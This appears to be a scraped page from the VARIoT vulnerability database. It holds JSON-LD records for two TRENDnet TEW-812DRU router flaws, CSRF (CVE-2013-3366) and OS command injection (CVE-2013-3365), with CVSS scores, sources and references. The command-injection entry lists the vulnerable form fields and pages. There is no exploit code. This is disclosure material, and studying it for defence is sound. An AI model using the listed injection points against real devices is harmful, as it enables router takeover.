"https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.45192307 }, "last_update_date": "2024-08-14T15:33:46.127000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.trendnet.com/home" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006930" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "trust": 1.7, "url": "https://www.ise.io/soho_service_hacks/" }, { "trust": 1.7, "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3366" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3366" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/352.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-3366" }, { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "CNNVD", "id": "CNNVD-201911-770" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-3366" }, { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "CNNVD", "id": "CNNVD-201911-770" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-13T00:00:00", "db": "VULMON", "id": "CVE-2013-3366" }, { "date": "2019-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "date": "2019-11-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-770" }, { "date": "2019-11-13T22:15:11.303000", "db": "NVD", "id": "CVE-2013-3366" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-10T00:00:00", "db": "VULMON", "id": "CVE-2013-3366" }, { "date": "2019-11-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "date": "2020-07-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-770" }, { "date": "2020-02-10T21:24:48.513000", "db": "NVD", "id": "CVE-2013-3366" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-770" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "TRENDnet TEW-812DRU Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006930" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-770" } ], "trust": 0.6 } }
var-201402-0091
Vulnerability from variot
TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU multiple scripts incorrectly filter user-submitted input, allowing remote attackers to exploit malicious exploits to submit malicious requests to inject OS commands and execute them with WEB privileges. Trendnet TEW-812DRU is prone to multiple command-injection vulnerabilities. Exploiting these issues could allow an attacker to execute arbitrary commands in the context of the affected devices. There is a security vulnerability in TRENDnet TEW-812DRU router, the vulnerability is caused by the program not sufficiently filtering the 'NtpDstEnd' and '\'\'NtpDstOffset' fields in the setNTP.cgi script
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201402-0091", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tew-812dru", "scope": "eq", "trust": 1.6, "vendor": "trendnet", "version": null }, { "model": "tew-812dru", "scope": null, "trust": 1.4, "vendor": "trendnet", "version": null }, { "model": "tew-812dru", "scope": "eq", "trust": 0.3, "vendor": "trendnet", "version": "0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "BID", "id": "61492" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNNVD", "id": "CNNVD-201307-630" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:trendnet:tew-812dru", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005989" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jacob Holcomb", "sources": [ { "db": "BID", "id": "61492" }, { "db": "CNNVD", "id": "CNNVD-201307-630" } ], "trust": 0.9 }, "cve": "CVE-2013-3365", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.8, "id": "CVE-2013-3365", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2013-11064", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.8, "id": "VHN-63367", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-3365", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-3365", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2013-11064", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201307-630", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-63367", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "VULHUB", "id": "VHN-63367" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNNVD", "id": "CNNVD-201307-630" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU multiple scripts incorrectly filter user-submitted input, allowing remote attackers to exploit malicious exploits to submit malicious requests to inject OS commands and execute them with WEB privileges. Trendnet TEW-812DRU is prone to multiple command-injection vulnerabilities. \nExploiting these issues could allow an attacker to execute arbitrary commands in the context of the affected devices. There is a security vulnerability in TRENDnet TEW-812DRU router, the vulnerability is caused by the program not sufficiently filtering the \u0027NtpDstEnd\u0027 and \u0027\\\u0027\\\u0027NtpDstOffset\u0027 fields in the setNTP.cgi script", "sources": [ { "db": "NVD", "id": "CVE-2013-3365" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "BID", "id": "61492" }, { "db": "VULHUB", "id": "VHN-63367" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-63367", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-63367" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-3365", "trust": 3.4 }, { "db": "BID", "id": "61492", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-005989", "trust": 0.8 }, { "db": "EXPLOIT-DB", "id": "27177", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201307-630", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-11064", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-63367", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "VULHUB", "id": "VHN-63367" }, { "db": "BID", "id": "61492" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNNVD", "id": "CNNVD-201307-630" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "id": "VAR-201402-0091", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "VULHUB", "id": "VHN-63367" } ], "trust": 1.15192307 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" } ] }, "last_update_date": "2024-08-14T15:24:47.050000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "TEW-812DRU", "trust": 0.8, "url": "http://www.trendnet.com/products/proddetail.asp?prod=105_TEW-812DRU" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005989" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-78", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-63367" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://infosec42.blogspot.com/2013/07/exploit-trendnet-tew-812dru-csrfcommand.html" }, { "trust": 1.7, "url": "http://securityevaluators.com/content/case-studies/routers/vulnerability_catalog.pdf" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3365" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3365" }, { "trust": 0.8, "url": "http://securityevaluators.com/knowledge/case_studies/routers/vulnerability_catalog.pdf" }, { "trust": 0.6, "url": "http://www.exploit-db.com/exploits/27177/" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/61492" }, { "trust": 0.3, "url": "http://www.plccenter.com/buy/trendnet/tew812dru?source=adwords_part\u0026gclid=ciot5-3z1lgcfqnyqgodcx4avw" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "VULHUB", "id": "VHN-63367" }, { "db": "BID", "id": "61492" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNNVD", "id": "CNNVD-201307-630" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2013-11064" }, { "db": "VULHUB", "id": "VHN-63367" }, { "db": "BID", "id": "61492" }, { "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "db": "CNNVD", "id": "CNNVD-201307-630" }, { "db": "NVD", "id": "CVE-2013-3365" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-31T00:00:00", "db": "CNVD", "id": "CNVD-2013-11064" }, { "date": "2014-02-04T00:00:00", "db": "VULHUB", "id": "VHN-63367" }, { "date": "2013-07-28T00:00:00", "db": "BID", "id": "61492" }, { "date": "2014-02-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "date": "2013-07-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-630" }, { "date": "2014-02-04T21:55:05.200000", "db": "NVD", "id": "CVE-2013-3365" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-31T00:00:00", "db": "CNVD", "id": "CNVD-2013-11064" }, { "date": "2014-02-05T00:00:00", "db": "VULHUB", "id": "VHN-63367" }, { "date": "2013-07-28T00:00:00", "db": "BID", "id": "61492" }, { "date": "2014-02-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005989" }, { "date": "2014-02-12T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-630" }, { "date": "2014-02-05T14:26:40.190000", "db": "NVD", "id": "CVE-2013-3365" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-630" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "TRENDnet TEW-812DRU Arbitrary command execution vulnerability in router", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005989" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "operating system commend injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-630" } ], "trust": 0.6 } }